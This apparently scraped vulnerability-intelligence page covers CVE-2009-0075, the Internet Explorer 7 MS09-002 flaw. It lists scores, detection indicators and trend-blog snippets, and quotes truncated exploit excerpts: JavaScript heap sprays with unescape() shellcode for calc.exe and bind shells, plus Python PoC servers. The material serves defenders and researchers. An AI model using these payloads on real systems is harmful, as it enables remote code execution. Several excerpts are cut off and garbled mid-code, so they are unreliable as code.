CVE-2009-0075
published 2009-02-10CVE-2009-0075: Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary…
PriorityP274critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
85.28%
99.7th percentile
Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u0c0c%u0c0c
bytes↗
%u0C0C%u0C0C
bytes↗
%u0c0c%u0c0c
bytes↗
%u0D0D%u0D0D
bytes↗
\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f
bytes↗
%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e
bytes↗
%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef
bytes↗
%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178
- →Exploit delivers a crafted HTML page via HTTP containing heap spray using NOP sled value 0x0C0C0C0C (or 0x0D0D0D0D) and unescape() shellcode blobs; detect large repeated %u0c0c%u0c0c or %u0D0D%u0D0D patterns in HTTP responses targeting IE 7. ↗
- →Exploit HTML pages contain a characteristic JavaScript heap-spray pattern: allocating a large Array, computing heap_chunk_size of 0x40000, and filling with unescape() NOP sleds followed by shellcode — look for this combination in HTTP response bodies. ↗
- →Metasploit module randomizes JS variable names but uses a fixed redirect pattern with a random alpha query string (?<rand_alpha_key>) before delivering the exploit page; the redirect URI pattern can be used for detection. ↗
- →Exploit targets CFunctionPointer uninitialized memory in IE 7 via crafted HTML; the vulnerability is triggered by appending document objects — monitor for exploitation of mshtml.dll CFunctionPointer code path in IE 7 process. ↗
- →Bind-shell payload opens TCP port 5500 on the victim; monitor for unexpected listening services on port 5500 after IE 7 exploitation. ↗
- →Bind-shell payload opens TCP port 28876 on the victim; monitor for unexpected listening services on port 28876 after IE 7 exploitation. ↗
- →Metasploit module uses 'migrate -f' as InitialAutoRunScript post-exploitation; detect meterpreter process migration immediately after iexplore.exe exploitation. ↗
- ·Exploit is confirmed only against Internet Explorer 7 specific builds; the Metasploit module targets Windows XP SP2-SP3 and Windows Vista SP0 with IE 7 only. ↗
- ·The PoC exploit (8152) was tested specifically on Internet Explorer 7.0.5730.11 on Windows XP SP2; reliability on other patch levels is not confirmed. ↗
- ·Metasploit module notes there is no way to fingerprint the target before attempting exploitation (no vuln_test), meaning the exploit is fired blindly at any connecting client. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wmm4-42gq-5r23: Safari on Apple iPhone OS 3
ghsa_unreviewed·2022-05-02·CVSS 9.3
CVE-2010-1176 [CRITICAL] CWE-94 GHSA-wmm4-42gq-5r23: Safari on Apple iPhone OS 3
Safari on Apple iPhone OS 3.1.3 for iPod touch allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors related to an array of long strings, an array of IMG elements with crafted strings in their SRC attributes, a TBODY element with no associated TABLE element, and certain calls to the delete operator and the cloneNode, clearAttributes, and CollectGarbage methods, possibly a related issue to CVE-2009-0075.
GHSA
GHSA-84pr-v9rf-j48h: Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arb
ghsa_unreviewed·2022-05-02
CVE-2009-0075 [HIGH] GHSA-84pr-v9rf-j48h: Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arb
Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability."
VulnCheck
Microsoft Internet Explorer 7 Uninitialized Memory Corruption Vulnerability
vulncheck·2009·CVSS 9.3
CVE-2009-0075 [CRITICAL] Microsoft Internet Explorer 7 Uninitialized Memory Corruption Vulnerability
Microsoft Internet Explorer 7 Uninitialized Memory Corruption Vulnerability
Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability."
Affected: Microsoft Internet Explorer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/; https://unit42.paloaltonetworks.com/unit42-the-old-and-new-current-trends-in-web-based-thr
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)
exploitdb·2010-07-12
CVE-2009-0075 Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)
Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)
---
##
# $Id: ms09_002_memory_corruption.rb 9787 2010-07-12 02:51:50Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
# :ua_minver => "7.0",
# :ua_maxver => "7.0",
# :javascript => true,
# :os_name => OperatingSystems::WINDOWS,
# :vuln_test => nil, # no way to test without just trying it
#})
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explo
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb·2009-03-04
CVE-2009-0076 Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#
# Author : Ahmed Obied ([email protected])
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
payload += '\xe4\x36\x3a\x
Exploit-DB
Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)
---
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031
Exploit-DB
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
---
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.lengthwindow.setTimeout("ok();",800);
# milw0rm.com [2009-02-20]
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportErro
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)
exploitdb·2009-02-18
CVE-2009-0075 Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)
Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)
---
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.lengthwindow.setTimeout("ok();",800);
# milw0rm.com [2009-02-18]
Metasploit
MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
metasploit
MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.
Unit42
Web-Based Threats: First Half 2019
blogs_unit42·2019-11-01
Web-Based Threats: First Half 2019
Threat Research Center
Trend Reports
Malware
## Web-Based Threats: First Half 2019
Fang Liu
Tao Yan
Jin Chen
Rongbo Shao
Zhanglin He
Bo Qu
Published: November 1, 2019
Malware
Trend Reports
Vulnerabilities
ELink
Exploit Kits
Malicious Domains
Malicious URL
Phishing
## Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system . In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which helps us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically, statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
Unit42
Web-Based Threats: First Half 2019
blogs_unit42·2019-11-01
Web-Based Threats: First Half 2019
# Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which helps us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically, statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
We observed a significant decrease in the activity of the Fallout exploit kit in the first quarter of 2019 while at the same time observing an increase in activity of the Kaixin exploit kit in the second quarter. Kaixin is primarily observed hosted in China and with the increased popularit
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
[CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
# Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain data; there was a significant drop in the number of malicious URLs as well as a drop in malicious domains that will be discussed below. In addition, we will be covering an interesting malicious Flash SWF that exploits CVE-2015-5119.
# URLs
Based on our analysis of dat
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
CVE-2015-5119 [CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Threat Research Center
Trend Reports
Malware
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Xingyu Jin
Published: December 27, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2015-5119
ELink
## Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain d
Unit42
Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42·2018-09-05·CVSS 7.5
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Threat Research Center
Trend Reports
Vulnerabilities
## Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: September 5, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2018-8174
ELink
Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here . We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerabil
Unit42
Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42·2018-09-05·CVSS 7.5
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here. We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerability we discuss below) using the Double Kill exploit.
What we found this quarter was that vulnerabilities under attack remained consistent, including very old vulnerabilities. One new vulnerability used zero-day attacks did rocket to near the top of the list.
The United States remained the num
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
[CRITICAL] The Old and New: Current Trends in Web-based Threats
Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
Statistics analysis
CVEs
In the first quarter of 2018, we found 1583 malicious URLs across 496 different domains. Attackers used at least 8 old and public vulnerabilities as shown in Figure 1. The Top 3 CVEs used are
1. CVE-2014-6332: exploited by 774 malicious URLs
2. CVE-2016-0189: exploited by 219 malicious URLs
3. CVE-2015-5122: exploited by 85 malici
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
CVE-2014-6332 [CRITICAL] The Old and New: Current Trends in Web-based Threats
Threat Research Center
Trend Reports
Vulnerabilities
## The Old and New: Current Trends in Web-based Threats
Tao Yan
Bo Qu
Zhanglin He
Rongbo Shao
Published: June 20, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2014-6332
CVE-2016-0189
EK
Exploit kit
KaiXin
Rig
Sundown
Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
Statistics analysis
CVEs
In the first quarter of 2018, we found 1
http://osvdb.org/51839http://www.securityfocus.com/bid/33627http://www.us-cert.gov/cas/techalerts/TA09-041A.htmlhttp://www.vupen.com/english/advisories/2009/0389http://www.zerodayinitiative.com/advisories/ZDI-09-011/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-002https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6000https://www.exploit-db.com/exploits/8077https://www.exploit-db.com/exploits/8079https://www.exploit-db.com/exploits/8080https://www.exploit-db.com/exploits/8082http://osvdb.org/51839http://www.securityfocus.com/bid/33627http://www.us-cert.gov/cas/techalerts/TA09-041A.htmlhttp://www.vupen.com/english/advisories/2009/0389http://www.zerodayinitiative.com/advisories/ZDI-09-011/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-002https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6000https://www.exploit-db.com/exploits/8077https://www.exploit-db.com/exploits/8079https://www.exploit-db.com/exploits/8080https://www.exploit-db.com/exploits/8082
2009-02-10
Published
Exploited in the wild